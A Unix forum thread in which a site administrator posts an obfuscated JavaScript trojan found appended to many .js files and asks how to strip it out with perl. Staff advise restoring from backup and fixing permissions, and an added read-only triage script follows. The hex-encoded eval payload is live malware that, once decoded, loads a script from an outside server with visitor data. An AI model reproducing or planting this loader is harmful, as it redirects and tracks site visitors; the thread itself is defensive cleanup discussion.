how to remove hacking code from multiple files | Unix Linux Forums | Shell Programming and Scripting



Shell Programming and Scripting Post questions about KSH, CSH, SH, BASH, PERL, PHP, SED, AWK and OTHER shell scripts and shell scripting languages here.

    #1  
Old 10-02-2012
MaRiOsGR MaRiOsGR is offline
Registered User
 
Join Date: Apr 2012
Last Activity: 20 February 2013, 6:26 AM EST
Posts: 16
Thanks: 1
Thanked 0 Times in 0 Posts
how to remove hacking code from multiple files

Hello,

I've located with clamav multiple .js files infected at the end with the following (JS.Trojan.Redir-3) code:


Code:
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29
\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27
\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B
\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63
\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63
\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72
\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D
\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69
\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79
\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C
\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,
_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--)
{_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return 
_0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3])
{_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} 
(_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

I would like to remove all of these with a shell command.

I would use as an example this one :

Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

but I'm not sure what to change with all the escape characters and the * symbols.

Any help would be appreciated.
    #2  
Old 10-03-2012
jim mcnamara jim mcnamara is offline Forum Staff  
 
Join Date: Feb 2004
Last Activity: 24 October 2014, 12:39 PM EDT
Location: NM
Posts: 10,250
Thanks: 282
Thanked 803 Times in 747 Posts
Suggestion: if this is java for an application remove the app completely and then re-install. Assuming these are required for some application that users need, you could break the application by trying to uninject code.

If new files just magically appeared then delete the whole files.

However the code got injected, there are some problems on the system with permissions, or someone is surfing the net with privilege, or working on questionable sites. You need to block the behavior or change file permissions that put the code there.

And consider hardening your system.
    #3  
Old 10-03-2012
Corona688 Corona688 is offline Forum Staff  
Mead Rotor
 
Join Date: Aug 2005
Last Activity: 24 October 2014, 4:38 PM EDT
Location: Saskatchewan
Posts: 19,683
Thanks: 823
Thanked 3,352 Times in 3,139 Posts
Yeah, restore from backup or re-install. Would you ever really trust those files again? I wouldn't.
    #4  
Old 10-04-2012
MaRiOsGR MaRiOsGR is offline
Registered User
 
Join Date: Apr 2012
Last Activity: 20 February 2013, 6:26 AM EST
Posts: 16
Thanks: 1
Thanked 0 Times in 0 Posts
I'm not asking for opinions on whether I should harden the server or delete the files.
My question is specifically about removing specific text from multiple files with a shell script.
Maybe the text wouldn't be hack code; maybe it would be a poem. Still, I want to do the same thing: remove specific text from multiple files with a shell script.
    #5  
Old 10-04-2012
bakunin bakunin is offline Forum Staff  
Bughunter Extraordinaire
 
Join Date: May 2005
Last Activity: 24 October 2014, 6:36 PM EDT
Location: In the leftmost byte of /dev/kmem
Posts: 4,286
Thanks: 45
Thanked 824 Times in 651 Posts
Quote:
Originally Posted by MaRiOsGR View Post
I'm not asking of opinions
Please accept my sincere apologies for the impetuosity of my young and inexperienced colleagues who tried to help you. Of course they were wrong.

Quote:
I would like to remove all of these with a shell command.
To strictly answer your question: use any text-editing tool you like, including (but not limited to): awk, sed, perl, ed, ex, vi, ... All of these tools can be invoked as shell commands.

Quote:
I would use as an example this one :


Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i [...]

but I'm not sure what to change with all the escape characters and the * symbols.
If you are not sure, I suggest you use another tool with which you are. Replace "perl" with "awk", "sed" or any other of the aforementioned text filters until you find one with which you are indeed sure, then use that one. To suggest one would largely be a matter of opinion, and you specifically did not ask for that, so I will keep my completely arbitrary personal pejoratives to myself.

I hope this helps.

bakunin
    #6  
Old 10-04-2012
MaRiOsGR MaRiOsGR is offline
Registered User
 
Join Date: Apr 2012
Last Activity: 20 February 2013, 6:26 AM EST
Posts: 16
Thanks: 1
Thanked 0 Times in 0 Posts
Quote:
Originally Posted by bakunin View Post
To suggest one would largely be a matter of opinion and you specifically did not ask for that, so i will keep my completely arbitrary personal pejoratives to myself.
It's "good" to see you have spare time for irony;
it has nothing to do with helping, but of course everyone can post whatever he likes.

While posting here in the forum I see
Quote:
Shell Programming and Scripting Post questions about KSH, CSH, SH, BASH, PERL, PHP, SED, AWK and OTHER shell scripts and shell scripting languages here.
I'm sure they put it there for a reason, so the replies I got were about the security of the server and not about the correct usage of perl:

Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

I know you got insulted by my previous post, for a reason I cannot explain, but my question was specific and I was trying to narrow down the possible answers.

Someone could also reply that I should not use javascript,
or that I shouldn't use linux servers,
but that would be no help at all, would it?

Quote:
Originally Posted by bakunin View Post
If you are not sure i suggest you use another tool with which you are..
If I were sure about another tool or the exact command,
I wouldn't post this, asking for people who know how to use it correctly,
would I?
    #7  
Old 10-04-2012
Corona688 Corona688 is offline Forum Staff  
Mead Rotor
 
Join Date: Aug 2005
Last Activity: 24 October 2014, 4:38 PM EDT
Location: Saskatchewan
Posts: 19,683
Thanks: 823
Thanked 3,352 Times in 3,139 Posts
If there was an easy magic do-everything fix for you, we'd give it to you so you could get it fixed and stop insulting us.

It's not "opinion". I've dealt with this before. These kinds of malware infections are designed to be difficult to detect and remove. When I ran into a situation like this where the customer had no backups, I wrestled with it for days, but removing the bad parts kept breaking the pages, and it made efforts to put itself back that made everything worse than when I started. I eventually had to track down the original .zip files for the software -- thank goodness the internet is huge, some data-packrat somewhere or other is likely to have anything -- replace everything with a .php extension, and remove everything else newer than 90 days old.

Then afterwards, I secured the permissions properly so it wouldn't happen again...
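Added example, not code from the thread or from any of its posters: a read-only triage pass that follows the two leads the replies give, the permissions that let the code get written in the first place (post #2) and the "everything newer than N days" sweep (post #7). It changes nothing, so it can be run before cleaning and again afterwards. The directory and the day cut-off are assumed to be supplied by the caller (e.g. /vhosts and 90); both are placeholders, not values from the thread.

```shell
#!/bin/sh
# Added example, not code from the thread: a read-only triage pass over a web
# root that follows the two leads the replies give -- paths the web-server
# process could write to (world-writable) and files that changed recently.
# It modifies nothing; review the list before deleting or restoring anything.
#
# Assumptions: DIR is the tree to inspect (e.g. /vhosts) and DAYS the cut-off
# (post #7 used 90); -perm -0002 and -mtime are standard find(1) options.

# world_writable DIR: files and directories under DIR that any user may write to.
# One world-writable directory is enough for a compromised web-server process
# to drop new files beside the legitimate ones.
world_writable() {
    find "$1" \( -type f -o -type d \) -perm -0002
}

# modified_within DIR DAYS: regular files whose content changed in the last DAYS days.
# Attackers often reset mtimes, so an empty list proves nothing; a non-empty
# one is still the quickest way to find the batch that was edited together.
modified_within() {
    find "$1" -type f -mtime "-$2"
}

# triage DIR DAYS: one line per finding, tagged with the check that fired.
# Returns 0 when nothing was found and 1 otherwise, so it can gate a deploy.
triage() {
    findings=$(
        world_writable "$1" | sed 's/^/WORLD_WRITABLE /'
        modified_within "$1" "$2" | sed 's/^/RECENT /'
    )
    [ -n "$findings" ] && printf '%s\n' "$findings"
    [ -z "$findings" ]
}

# Usage: sh triage.sh /vhosts 90
if [ "$#" -eq 2 ] && [ -d "$1" ]; then
    triage "$1" "$2"
fi
```

A world-writable hit under a document root is the finding to act on first: until the directory or file is no longer writable by the account the web server runs as, cleaning the .js files only buys time until the next write. The RECENT list is a starting point for comparison against a pristine copy of the application, not a list of files to delete.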